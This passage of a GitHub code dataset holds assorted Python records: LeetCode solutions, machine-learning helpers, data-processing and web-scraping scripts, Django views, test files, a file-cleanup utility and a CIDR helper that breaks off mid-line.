       # are active in one of the vectors.\n        union = vec1.keys() | vec2.keys()\n\n        return math.sqrt(sum((vec1[key] - vec2[key])**2\n                             for key in union))\n\n    def cosine_similarity(self, w1, w2):\n        vec1, vec2 = self.transform((w1, w2))\n\n        # Save computation by only computing values for features that\n        # are active in both vectors\n        intersect = set(vec1.keys()).intersection(vec2.keys())\n\n        dot_product = sum(vec1[key]*vec2[key] for key in intersect)\n\n        # Return dot product for normalized vectors\n        if self.is_normalized:\n            return dot_product\n        else:\n            return dot_product / (self.vector_norm(w1)*self.vector_norm(w2))\n\n    def nearest_neighbors(self, w, k=5):\n        if w in self.vocab:\n            # Use heapq to efficiently find the top k neighbors.\n            return heapq.nlargest(k,\n                                  ((other, self.cosine_similarity(w, other))\n                                   for other in self.matrix if other != w),\n                                  key=lambda x: x[1])\n\nprint(\"Loading corpus...\")\nsentences = preprocess(aviskorpus_10_nn.sentences())\n\nvec = WordVectorizer(5000, 5)\nvec.fit(sentences)\n","repo_name":"joevko/projects","sub_path":"in2110/in2110-lab-master/in2110-lab-master/gruppetimer/02-oblig-v2019/in2110-oblig-1b-solution.py","file_name":"in2110-oblig-1b-solution.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
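A hand-checked instance of the cosine formula the class above implements, using synthetic counts independent of the corpus: the dot product runs over shared features only, and the norms run over all features of each vector.

import math
from collections import Counter

v1 = Counter({'cat': 2, 'dog': 1})
v2 = Counter({'cat': 1, 'fish': 3})
shared = v1.keys() & v2.keys()                      # {'cat'}
dot = sum(v1[k] * v2[k] for k in shared)            # 2*1 = 2
norm1 = math.sqrt(sum(c * c for c in v1.values()))  # sqrt(5)
norm2 = math.sqrt(sum(c * c for c in v2.values()))  # sqrt(10)
print(dot / (norm1 * norm2))                        # 2/sqrt(50) ~ 0.283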
+{"seq_id":"23633001109","text":"# TreeNode is provided by the LeetCode scaffold; define or import it before\n# this class when running the snippet standalone, since the annotations below\n# are evaluated at definition time.\nclass Queue():\n    # Despite the name, pop(-1) takes from the same end that push appends to,\n    # so this container behaves as a stack and the traversal below is DFS.\n    def __init__(self, queue: list):\n        self.queue = queue\n\n    def pop(self):\n        if self.queue:\n            return self.queue.pop(-1)\n        else:\n            return None\n\n    def push(self, tree_node: TreeNode):\n        self.queue.append(tree_node)\n\nclass Solution:\n    def getTargetCopy(self, original: TreeNode, cloned: TreeNode, target: TreeNode) -> TreeNode:\n        queue = Queue([cloned])\n        while True:\n            node = queue.pop()\n            if node is None:\n                break\n            if node.val == target.val:\n                return node\n            if node.right is not None:\n                queue.push(node.right)\n            if node.left is not None:\n                queue.push(node.left)\n        return None\n","repo_name":"licht110/leetcode","sub_path":"algorithms/1379/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
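A usage sketch for the record above; `TreeNode` is not defined there (LeetCode injects it), so a minimal stand-in is assumed here, declared before the classes as the comment in the record requires.

class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right

def clone(node):
    # deep-copy a binary tree so the search has a separate "cloned" instance
    if node is None:
        return None
    return TreeNode(node.val, clone(node.left), clone(node.right))

original = TreeNode(7, TreeNode(4), TreeNode(3, TreeNode(6), TreeNode(19)))
cloned = clone(original)
found = Solution().getTargetCopy(original, cloned, target=original.left)
print(found is cloned.left)  # True - the returned node lives in the cloned tree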
+{"seq_id":"74427487441","text":"# Properties to check. The property 'order' doesn't have to be here.\nproperties = ['configVersion', 'chartName', 'chartVersion']\nexecuteModify = False\nfor prop in properties:\n if (deployed[prop] != previousDeployed[prop]):\n executeModify = True\n\nif executeModify:\n myStep = steps.os_script(\n description = \"Updating component {0}\".format(deployed.name),\n order = deployed['order'],\n script = \"scripts/modify.sh.ftl\",\n freemarker_context = {\n \"deployedApplicationVersion\": deployedApplication.version.name,\n \"deployedApplicationEnvironment\": deployedApplication.environment.name\n # Some more properties\n }\n )\nelse:\n myStep = steps.noop(\n description = \"Only the 'order' property has changed. Nothing to do on {0}\".format(deployed.name),\n order = deployed['order']\n )\n\ncontext.addStep(myStep)","repo_name":"jclopeza/xld-custom-extensions","sub_path":"xld-custom-order-plugin/planning/GenerateCustomSteps.py","file_name":"GenerateCustomSteps.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"24605893250","text":"#!/usr/bin/env python3\n\"\"\"\nAdam optimization algorithm\n\"\"\"\n\n\nimport numpy as np\n\n\ndef update_variables_Adam(alpha, beta1, beta2, epsilon, var, grad, v, s, t):\n \"\"\"\n Updates a variable in place using the Adam optimization algorithm.\n Args:\n alpha: learning rate\n beta1: weight used for the first moment\n beta2: weight used for the second moment\n epsilon: small number to avoid division by zero\n var: numpy.ndarray containing the variable to be updated\n grad: numpy.ndarray containing the gradient of var\n v: previous first moment of var\n s: previous second moment of var\n t: time step used for bias correction\n Returns:\n The updated variable, the new first moment, and the new second moment,\n respectively.\n \"\"\"\n vdw = (beta1*v) + ((1-beta1)*grad)\n vdw_correct = vdw/(1-(beta1**t))\n sdw = (beta2*s) + (1-beta2)*(grad**2)\n sdw_correct = sdw/(1-(beta2**t))\n sdw_correct_sqrt = (sdw_correct**(1/2.0))+epsilon\n return var - (alpha*(vdw_correct/sdw_correct_sqrt)), vdw, sdw\n","repo_name":"Luffy981/holbertonschool-machine_learning","sub_path":"supervised_learning/0x03-optimization/9-Adam.py","file_name":"9-Adam.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
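A quick numeric sanity check of the update above (synthetic values, t = 1): with zero-initialized moments, the bias correction exactly undoes the (1 - beta) scaling of the first step.

import numpy as np

var = np.array([1.0])
grad = np.array([0.5])
new_var, v1, s1 = update_variables_Adam(0.1, 0.9, 0.999, 1e-8,
                                        var, grad, np.zeros(1), np.zeros(1), 1)
print(v1)       # [0.05]    = 0.9*0 + 0.1*0.5
print(s1)       # [0.00025] = 0.999*0 + 0.001*0.5**2
print(new_var)  # ~[0.9]    = 1.0 - 0.1 * (0.5 / (sqrt(0.25) + 1e-8))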
+{"seq_id":"12696604364","text":"import numpy as np\r\nimport imageio\r\nimport scipy.ndimage\r\nimport cv2\r\n\r\n\r\nprint(\"=========================\")\r\nprint(\"Image To Sketch Converter\")\r\nprint(\"=========================\\n\")\r\nimg = input(\"Enter image Name: \")\r\n\r\ndef rgb2gray(rgb):\r\n return np.dot(rgb[...,:3],[0.2989,0.5870,0.1140])\r\n\r\ndef dodge(front,back):\r\n final_sketch = front*255/(255-back)\r\n final_sketch[final_sketch>255]=255\r\n final_sketch[back==255]=255\r\n return final_sketch.astype('uint8')\r\n\r\nss = imageio.imread(img)\r\ngray = rgb2gray(ss)\r\n\r\ni = 255-gray\r\n\r\nblur = scipy.ndimage.filters.gaussian_filter(i,sigma =15)\r\nr = dodge(blur,gray)\r\n\r\n\r\nif '.jpg' in img:\r\n img = img.replace('.jpg', '')\r\nelif '.png' in img:\r\n img = img.replace('.png', '')\r\nelif '.svg' in img:\r\n img = img.replace('.svg', '')\r\nelif '.jpeg' in img:\r\n img = img.replace('.jpeg', '')\r\n\r\n\r\ncv2.imwrite(img + ' - Sketch.png',r)\r\n","repo_name":"Aessteer/Image-to-Sketch-Using-Python","sub_path":"Sketch.py","file_name":"Sketch.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"20161410765","text":"print(\"Enter Number of Train Data : \")\r\ninpt = input()\r\n\r\nn = int(inpt)\r\n\r\nweight = []\r\nheight = []\r\nlabel = []\r\n\r\nprint(\"Enter Train Data : \\n\")\r\n\r\n#for i in range(n):\r\nw, h, l = input().split()\r\n\r\n# input() returns strings, so convert before doing arithmetic;\r\n# w + h on the raw values would concatenate text instead of adding numbers\r\nm = int(w) + int(h)\r\n\r\nprint(m)\r\nprint(l)\r\n\r\n#weight=int(w)\r\n#height=int(h)\r\n#label=l;\r\n","repo_name":"AnamIslam/PatternRecognitionLab","sub_path":"Lab 1/PatternExp.py","file_name":"PatternExp.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"41293913571","text":"import pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nimport json\nimport lxml\n\ndef scrap_data(web):\n html = requests.get(web)\n # if html.status_code != 200:\n # Collect description\n data = re.search(r'window\\.initialAppState = ({.*});', html.text)\n data = json.loads(data.group(1))\n desc = data['preFetchedData']['organization']['description']\n \n if desc != None:\n # Clean description\n desc = desc.replace(' ', '')\n desc = desc.replace('\\n
', '\\n ')\n desc = desc.replace('
', ' ')\n desc = desc.replace('
', '')\n else:\n desc = ''\n\n # Images\n imageID = data['preFetchedData']['organization']['profilePicture']\n if imageID != None: image = data['imageServerBaseUrl'] + imageID\n else: image = ''\n\n # Summary\n summary = data['preFetchedData']['organization']['organizationType']['name']\n if summary == None: summary = ''\n return image, desc, summary\n\n\ndef main():\n df = pd.read_csv('./data/DPU_Org_Description.csv')\n arr_desc = []\n arr_img = []\n arr_summary = []\n for i in range(len(df)):\n image, desc, summary = scrap_data(df['URL'][i])\n print(df['Org'][i], ' Success')\n arr_desc.append(desc)\n arr_img.append(image)\n arr_summary.append(summary)\n df['Description'] = arr_desc\n df['Image'] = arr_img\n df['Summary'] = arr_summary\n df.to_csv('./data/DPU_desc.csv', index=False)\nmain()","repo_name":"hieumtran/DeBOO","sub_path":"src/org_description.py","file_name":"org_description.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
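The core extraction trick in the record above, regexing a JS state object out of the page and handing it to json.loads, can be exercised offline; a self-contained sketch with synthetic HTML (no network access):

import json
import re

page = '<script>window.initialAppState = {"preFetchedData": {"organization": {"description": "hi"}}};</script>'
match = re.search(r'window\.initialAppState = ({.*});', page)
state = json.loads(match.group(1))
print(state['preFetchedData']['organization']['description'])  # 'hi'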
+{"seq_id":"23764205704","text":"import os\r\nimport pytest\r\nimport pandas as pd\r\nimport vaex\r\nfrom datetime import datetime\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\nimport warnings\r\nimport gc\r\nimport psutil\r\n\r\nclass Test:\r\n    def test_directorio(self):\r\n        print('Directory: ', os.listdir())\r\n        assert True\r\n\r\n    def test_rfm_vaex(self):\r\n        print('test_rfm_vaex')\r\n        gc.collect()\r\n        print('\\nRAM in use BEFORE the test: ')\r\n        print(psutil.virtual_memory().percent)\r\n        print('%')\r\n\r\n        df = vaex.from_csv('work/RFM/2019-Oct-Nov-transformed.csv', parse_dates=['event_time'])\r\n        df['event_time'] = df[('event_time')].astype(\"datetime64[D]\")\r\n\r\n        #RECENCY\r\n        window = np.datetime64('2019-12-01')\r\n        window = window.astype(\"datetime64[D]\")\r\n        df_recency = df.groupby(by=['user_id'], agg=({'event_time': 'max'}))\r\n        df_recency['event_time'] = df_recency['event_time'].values.astype(\"datetime64[D]\")\r\n        df_recency['Recency'] = (df_recency['event_time'] - window) * (-1)\r\n        df_recency = df_recency[['user_id','Recency']]\r\n        df_recency['Recency'] = df_recency[('Recency')].values.astype(\"int\")\r\n\r\n        #FREQUENCY\r\n        df_frequency = df.groupby(by=['user_id'], agg='count')\r\n        df_frequency.rename('count','Frequency')\r\n\r\n        #MONETARY\r\n        df_monetary = df.groupby(by=['user_id'], agg=({'price': 'sum'}))\r\n        df_monetary.rename('price','Monetary')\r\n\r\n        # merge the three dataframes\r\n        df_rfm = df_recency.join(df_frequency,\r\n                how='inner',\r\n                left_on ='user_id',\r\n                right_on='user_id')\r\n\r\n        df_rfm = df_rfm.join(df_monetary,\r\n                how='inner',\r\n                left_on ='user_id',\r\n                right_on='user_id')\r\n\r\n        # remove outliers using the 98th percentile\r\n        # check max and min of Recency (it cannot be below 1 or above 61)\r\n        print(df_rfm['Recency'].min())\r\n        print(df_rfm['Recency'].max())\r\n        # check max and min of Frequency\r\n        print(df_rfm['Frequency'].min())\r\n        print(df_rfm['Frequency'].max())\r\n        # check max and min of Monetary\r\n        print(df_rfm['Monetary'].min())\r\n        print(df_rfm['Monetary'].max())\r\n\r\n        # For Frequency, compute the 98th percentile (p98) and keep the values below it.\r\n        p98 = df_rfm.percentile_approx('Frequency', 98)\r\n        print('98th percentile: ' + str(p98))\r\n        df_rfm = df_rfm[df_rfm.Frequency <= p98]\r\n\r\n        # For Monetary, compute the 2nd and 98th percentiles (p2 and p98) and keep the interval between them.\r\n        p2 = df_rfm.percentile_approx('Monetary', 2)\r\n        p98 = df_rfm.percentile_approx('Monetary', 98)\r\n        print('2nd percentile: ' + str(p2))\r\n        print('98th percentile: ' + str(p98))\r\n        df_rfm = df_rfm[df_rfm.Monetary > p2]\r\n        df_rfm = df_rfm[df_rfm.Monetary < p98]\r\n\r\n        # assign quintiles\r\n        rfm = pd.DataFrame(df_rfm, columns=['user_id','Recency','Frequency','Monetary'])\r\n        rfm = rfm.astype({'user_id':'int','Recency':'int','Frequency':'int'})\r\n\r\n        R_condition = [(rfm['Recency'] < 11),\r\n             ((rfm['Recency'] >= 11) & (rfm['Recency'] < 15)),\r\n             ((rfm['Recency'] >= 15) & (rfm['Recency'] < 28)),\r\n             ((rfm['Recency'] >= 28) & (rfm['Recency'] < 44)),\r\n             (rfm['Recency'] >= 44)]\r\n\r\n        option = [5,4,3,2,1]\r\n        rfm['R'] = np.select(R_condition, option, default=5)\r\n        condition = [(rfm.Frequency == 1) | (rfm.Frequency == 2),\r\n             (rfm.Frequency == 3) | (rfm.Frequency == 4),\r\n             (rfm.Frequency == 5) | (rfm.Frequency == 6),\r\n             (rfm.Frequency == 7) | (rfm.Frequency == 8)]\r\n        option = [1,2,3,4]\r\n        rfm['F'] = np.select(condition, option, default=5)\r\n\r\n        rfm['M'] = pd.qcut(rfm['Monetary'], q=5, labels=[1,2,3,4,5])\r\n        rfm['M'] = rfm['M'].astype(int)\r\n        rfm = vaex.from_pandas(rfm)\r\n        rfm[\"RFM_SCORE\"] = (rfm['R'].astype(str) +\r\n                  rfm['F'].astype(str) +\r\n                  rfm['M'].astype(str))\r\n\r\n        # map segments from the RFM_SCORE\r\n        seg_map = vaex.read_csv('work/RFM/segmentos_rfm.csv', usecols=['RFM_SCORE','segment'])\r\n        seg_map['RFM_SCORE'] = seg_map.RFM_SCORE.astype(str)\r\n\r\n        rfm = rfm.join(seg_map,\r\n                how='inner',\r\n                left_on ='RFM_SCORE',\r\n                right_on='RFM_SCORE')\r\n\r\n\r\n        rfm.export_csv('work/RFM/RFM VAEX Resultados.csv')\r\n\r\n        print('\\nRAM in use AFTER the test: ')\r\n        print(psutil.virtual_memory().percent)\r\n        print('%\\n')\r\n\r\n        assert True\r\n","repo_name":"MelRubino98/RFM","sub_path":"test_rfm_vaex.py","file_name":"test_rfm_vaex.py","file_ext":"py","file_size_in_byte":4998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"1436804962","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom .forms import TagForm, NoteForm\nfrom .models import Tag, Note\n\n\n@login_required(login_url='/login/')\ndef main(request):\n notes = Note.objects.all().filter(owner=request.user)\n tags = Tag.objects.all().filter(owner=request.user)\n if request.method == \"POST\":\n question = request.POST.get(\"question\")\n if not question.strip() == '':\n by_tags = list()\n by_desc = list()\n by_name = list()\n for each in notes:\n note_tags = list()\n for tag in each.tags.all():\n note_tags.append(tag.name)\n if question in each.description:\n by_desc.append(each)\n if question in note_tags:\n by_tags.append(each)\n if question in each.name:\n by_name.append(each)\n if len(by_name) > 0 or len(by_tags) > 0 or len(by_desc) > 0:\n by_tags.insert(0, \"BLANKTAG\")\n return render(request, 'notes/index.html', {\"by_tags\": by_tags, \"by_desc\": by_desc, \"by_name\": by_name})\n return render(request, 'notes/index.html', {\"notes\": notes, \"tags\": tags})\n\n\n@login_required(login_url='/login/')\ndef tag(request):\n if request.method == 'POST':\n names = request.POST.get(\"name\").split(\",\")\n request.POST = request.POST.copy()\n for each in names:\n each.strip()\n if not each.startswith(\"#\"):\n each = \"#\" + each.strip()\n request.POST.update({\"name\": each})\n form = TagForm({\"owner\": request.user, \"name\": request.POST.get('name')})\n if form.is_valid():\n form.save()\n return redirect(to='notes:main')\n\n return render(request, 'notes/tag.html', {'form': TagForm()})\n\n\n@login_required(login_url='/login/')\ndef note(request):\n tags = Tag.objects.all().filter(owner=request.user)\n try:\n form = NoteForm(\n {\"name\": request.POST.get('name'), \"description\": request.POST.get(\"description\"), \"owner\": request.user})\n if form.is_valid():\n new_note = form.save()\n\n choice_tags = Tag.objects.filter(name__in=request.POST.getlist('tags'))\n for tag in choice_tags.iterator():\n new_note.tags.add(tag)\n\n return redirect(to='notes:main')\n else:\n return render(request, 'notes/note.html', {\"tags\": tags, 'form': form})\n except:\n return render(request, 'notes/note.html', {\"tags\": tags, 'form': NoteForm()})\n\n\n@login_required(login_url='/login/')\ndef delete_note(request, note_id):\n Note.objects.get(pk=note_id, owner=request.user).delete()\n return redirect(to='notes:main')\n\n\n@login_required(login_url='/login/')\ndef edit(request, note_id):\n tags = Tag.objects.all().filter(owner=request.user)\n note = get_object_or_404(Note, pk=note_id, owner=request.user)\n if note:\n return render(request, 'notes/edit.html', {\"note\": note, \"tags\": tags})\n else:\n return redirect(to=\"notes:main\")\n\n\n@login_required(login_url='/login/')\ndef alteration(request, note_id):\n note = get_object_or_404(Note, pk=note_id, owner=request.user)\n note.description = request.POST.get('description')\n note.name = request.POST.get('name')\n note.save()\n\n for each in note.tags.all():\n note.tags.remove(each)\n for each in request.POST.getlist('tags'):\n tag = get_object_or_404(Tag, name=each)\n note.tags.add(tag)\n return redirect(\"notes:edit\", note_id=note_id)\n\n\n@login_required(login_url='/login/')\ndef tag_delete(request):\n for each in request.POST.getlist('tag_delete'):\n tag = get_object_or_404(Tag, name=each, owner=request.user)\n tag.delete()\n return 
redirect(to=\"notes:main\")","repo_name":"DioSWolF/web_command_project","sub_path":"personal_assistant/notes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"21573975415","text":"__author__ = \"vcancy\"\n\n\n# /usr/bin/python\n# -*-coding:utf-8-*-\n\n\"\"\"\n\nAnalysis: the array is sorted, so a single pass is enough; whenever a value\nequals the previous one, remove it from the array.\n\nKeep a temporary variable holding the most recent distinct value, and return\nthe final size of the array.\n\n\"\"\"\n\nclass Solution:\n    def removeDuplicates(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        if not nums:\n            return 0\n        temp = nums[0]\n        index = 1\n        n = len(nums)\n        while index < n:\n            if nums[index] == temp:\n                nums.pop(index)\n                n -= 1\n            else:\n                temp = nums[index]\n                index += 1\n        return index\n","repo_name":"vcancy/python-algorithm","sub_path":"leetcode/Algorithms/Array/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
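The pop-based version above is O(n^2), because list.pop(i) shifts every later element. A common O(n) alternative (a sketch, not the record's own code) overwrites duplicates in place with a write pointer and returns the new length:

def remove_duplicates_linear(nums):
    if not nums:
        return 0
    write = 1  # next slot to fill with a distinct value
    for read in range(1, len(nums)):
        if nums[read] != nums[write - 1]:
            nums[write] = nums[read]
            write += 1
    return write

nums = [1, 1, 2, 2, 3]
k = remove_duplicates_linear(nums)
print(k, nums[:k])  # 3 [1, 2, 3]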
+{"seq_id":"72944858962","text":"from subprocess import call\nfrom random import randint\n\nTESTS = int(input(\"TESTS = \"))\nMAXN = int(input(\"MAXN = \"))\nMAXM = int(input(\"MAXM = \"))\nMAXK = int(input(\"MAXK = \"))\n\nfor test in range(1, TESTS + 1):\n N, M, K = None, None, None\n if test < TESTS:\n N = randint(1, MAXN)\n M = randint(1, MAXM)\n K = randint(1, MAXK)\n else:\n N, M, K = MAXN, MAXM, MAXK\n\n if call(\"./generator \" + str(N) + \" \" + str(M) + \" \" + str(K) + \" > ninja.in\", shell=True) != 0:\n print(\"Generator crashed on test\", test)\n break\n\n if call(\"./main\", shell=True) != 0:\n print(\"Main source crashed on test\", test)\n break\n\n MAIN = [int(line.strip()) for line in open(\"ninja.out\")]\n\n if call(\"./brut\", shell=True) != 0:\n print(\"Brute-force source crashed on test\", test)\n break\n\n BRUT = [int(line.strip()) for line in open(\"ninja.out\")]\n\n if MAIN != BRUT:\n print(\"Different output on test\", test)\n break\n\n print(\"Case #\", test, \": OK\", sep=\"\")\n","repo_name":"adrian-budau/work","sub_path":"infoarena/ninja/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"}
+{"seq_id":"30152035797","text":"# https://github.com/vntechies/toolbox\n#\n# License: MIT\n#\n# This script get an index's statistics from Azure search service using Azure API\n\nimport json\n\nimport requests\n\n# These should be configured via pipeline variables or runtime env\nINDEX_NAME = \"\"\nAPI_VERSION = \"\"\nSEARCH_SERVICE_NAME = \"\"\nSEARCH_API_KEY = \"\"\n\n\ndef main():\n try:\n print(\"Getting statistics for indexes via AzureAPI\")\n\n url = \"https://%s.search.windows.net/indexes/%s/stats?api-version=%s\" % (\n SEARCH_SERVICE_NAME,\n INDEX_NAME,\n API_VERSION,\n )\n payload = {}\n headers = {\n \"Content-Type\": \"application/json\",\n \"api-key\": SEARCH_API_KEY,\n }\n\n print(\n \"Getting statistics of %s index on %s service\"\n % (INDEX_NAME, SEARCH_SERVICE_NAME)\n )\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n if response.status_code == 200:\n documentCount = json.loads(response.text)[\"documentCount\"]\n storageSize = json.loads(response.text)[\"storageSize\"]\n message = (\n \"Statistics of %s index on %s service: Document count: %s, Storage Size: %s\"\n % (INDEX_NAME, SEARCH_SERVICE_NAME, documentCount, storageSize)\n )\n print(message)\n elif response.status_code == 404:\n message = \"There is no %s index on %s service\" % (\n INDEX_NAME,\n SEARCH_SERVICE_NAME,\n )\n print(message)\n else:\n raise requests.ConnectionError(\n \"Expected status code 200, but got %d, with response: %s\"\n % (response.status_code, response.text)\n )\n except Exception as ex:\n error = \"Exception on getting statistics of %s index on %s service: %s\" % (\n INDEX_NAME,\n SEARCH_SERVICE_NAME,\n ex,\n )\n print(error)\n raise ex from None\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vntechies/toolbox","sub_path":"azure/search_service/get_index.py","file_name":"get_index.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"}
+{"seq_id":"41028650075","text":"import os\nfrom pathlib import Path\n\nimport openpnm as op\n\n\nclass MARockTest:\n\n def setup_class(self):\n ws = op.Workspace()\n ws.clear()\n\n def teardown_class(self):\n ws = op.Workspace()\n ws.clear()\n\n def test_load_MARock(self):\n path = Path(os.path.realpath(__file__),\n '../../../fixtures/3DMA-Castlegate')\n net = op.io.network_from_marock(filename=path)\n assert hasattr(net, 'conns')\n assert net.Np == 9915\n assert net.Nt == 21805\n a = {'pore.ID_number', 'pore.boundary_type', 'pore.coordination',\n 'pore.coords', 'pore.volume', 'throat.conns',\n 'throat.coords', 'throat.cross_sectional_area'}\n assert a.issubset(net.props())\n\n\nif __name__ == '__main__':\n import py\n\n # All the tests in this file can be run with 'playing' this file\n t = MARockTest()\n self = t # For interacting with the tests at the command line\n t.setup_class()\n for item in t.__dir__():\n if item.startswith('test'):\n print(f\"Running test: {item}\")\n t.__getattribute__(item)()\n","repo_name":"PMEAL/OpenPNM","sub_path":"tests/unit/io/MARockTest.py","file_name":"MARockTest.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":404,"dataset":"github-code","pt":"3"}
+{"seq_id":"73997374481","text":"class Solution:\n def maxSatisfaction(self, satisfaction: List[int]) -> int: \n \n max_sat = 0\n satisfaction.sort(reverse=True)\n\n cur_sat = 0\n cum_sum = 0\n\n for each_dish in satisfaction:\n\n cum_sum += each_dish\n cur_sat += cum_sum\n max_sat = max(max_sat, cur_sat)\n\n return max_sat\n","repo_name":"KajalGada/leetcode-python","sub_path":"Reducing Dishes/sol3.py","file_name":"sol3.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
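A worked example of the greedy in the record above (the class assumes LeetCode's `from typing import List` scaffold, which must be in scope before the class is defined): sorting [-1, -8, 0, 5, -9] descending gives [5, 0, -1, -8, -9]; the running totals are 5, 10, 14, 10, -3, so the best is 14, which matches cooking [-1, 0, 5] for -1*1 + 0*2 + 5*3.

# assuming `from typing import List` was in scope when the class was defined:
print(Solution().maxSatisfaction([-1, -8, 0, 5, -9]))  # 14
print(Solution().maxSatisfaction([4, 3, 2]))           # 20 = 2*1 + 3*2 + 4*3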
+{"seq_id":"34519167490","text":"\"\"\"\nDay 7 6/29/2021\nProblem: https://leetcode.com/problems/max-consecutive-ones-iii/\n\nGiven a binary array nums and an integer k, return the maximum number of consecutive 1's in the\narray if you can flip at most k 0's.\n \"\"\"\n\n\nclass Solution:\n def longestOnes(self, nums: list[int], k: int) -> int:\n max_count = 0\n a = 0\n b = 0\n\n for num in nums:\n b += 1\n if num == 0:\n k -= 1\n while k < 0:\n if nums[a] == 0:\n k += 1\n a += 1\n\n max_count = max(max_count, b - a)\n return max_count\n\n def longestOnes_2(self, nums: list[int], k: int) -> int:\n start = 0\n for end in range(len(nums)):\n k -= (1 - nums[end])\n if k < 0:\n k += (1 - nums[start])\n start = start + 1\n print(f'k: {k}, start: {start}, end: {end}')\n return end - start + 1\n\n\nif __name__ == \"__main__\":\n test = Solution()\n nums = [1,0,1,1,0,0,0,1,1,1,1,0,0,1,1]\n k = 2\n print(test.longestOnes(nums, k))\n print(test.longestOnes_2(nums, k))","repo_name":"Lazy-Beee/PythonLearning2021","sub_path":"04 LeetCode-practice/6-2021/6-29-2021 P.1004 Max Consecutive Ones III/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
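A quick check against the classic test case (note the `list[int]` annotations above require Python 3.9+, and `longestOnes_2` also prints a per-step trace): flipping at most k = 2 zeros in the array below yields a best window of length 6.

test = Solution()
print(test.longestOnes([1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0], 2))    # 6
print(test.longestOnes_2([1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0], 2))  # 6, after the trace lines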
+{"seq_id":"22264353156","text":"import os\nimport shutil\n\n#-------------------------------------------Delete a particular file along with its parent folder----------------------------------\n# Use os.path.basename() to extract the file name from the path string.\n# To extract the file name without the extension, use os.path.splitext().\n# Use os.path.dirname() to extract the directory name (folder name) from the path string, as shown below.\n# Use os.path.split() to get both the file and directory (folder) name. os.path.split() returns a tuple of the file name returned by os.path.basename() and the directory name returned by os.path.dirname().\n# Use os.path.splitext() to get the extension. os.path.splitext() splits the extension from the rest (the root) and returns them as a tuple. The extension contains the dot.\n# To create a path string with only the extension changed from the original, concatenate the first element of the tuple returned by os.path.splitext() with any extension.\n\ndef search_files(file_name, search_path):\n    output = []\n    # walk top-down from the root\n    for root, dirs, files in os.walk(search_path):\n        if file_name in files:\n            output.append(os.path.join(root, file_name))\n    return output\n\ndef delete_file_folder(file_name, search_path):\n    file_path = \"\"  # renamed from `str` to avoid shadowing the built-in\n    result = search_files(file_name, search_path)\n    for element in result:\n        file_path += element\n    print(\"Location of file \" + file_name + \" is \" + file_path)\n    dirname = os.path.dirname(file_path)\n    print(\"Directory path \" + dirname)\n    if os.path.exists(file_path):\n        shutil.rmtree(dirname)\n        # os.remove(file_path)\n        return file_path + \" deleted successfully along with parent folder \" + os.path.basename(dirname)\n    else:\n        return file_name + \": the file does not exist\"\n\n#print(search_files())\nprint(delete_file_folder(\"test3.txt\",'C:/Users/CBNITS'))\n","repo_name":"1998-surbhi/Automation_Testing_3","sub_path":"sub/delete_file.py","file_name":"delete_file.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"72655075280","text":"import socket\nimport struct\n\ndef cidr(address):\n    try:\n        x = socket.inet_aton(address)\n    except socket.error:\n        raise ValueError(\"%s is not a valid ip address\" % address)\n    # inet_aton returns packed bytes; unpack them as one big-endian unsigned\n    # 32-bit integer (portable, unlike ord() indexing, which breaks on Python 3\n    # because indexing bytes already yields ints)\n    return struct.unpack(\"!I\", x)[0]\n\ndef in_cidr(address, net):\n    \"\"\"\n    Takes two strings, the first an IP address, the second a network in\n    CIDR format.\n    Returns True if the address is in the network.\n\n    Example:\n    >>> in_cidr('10.0.0.7', '10.0.0.0/29')\n    True\n    >>> in_cidr('10.0.0.8', '10.0.0.0/29')\n    False\n    >>> in_cidr('127.0.0.1', '127.0.0.1')\n    True\n    \"\"\"\n\n    mask = 0xFFFFFFFF\n    components = net.split(\"/\")\n    if len(components) > 1:\n        # keep only the top prefix-length bits; & 0xFFFFFFFF clamps the\n        # inverted value back into 32 bits\n        mask = ~(0xFFFFFFFF >> int(components[1])) & 0xFFFFFFFF\n\n    x = 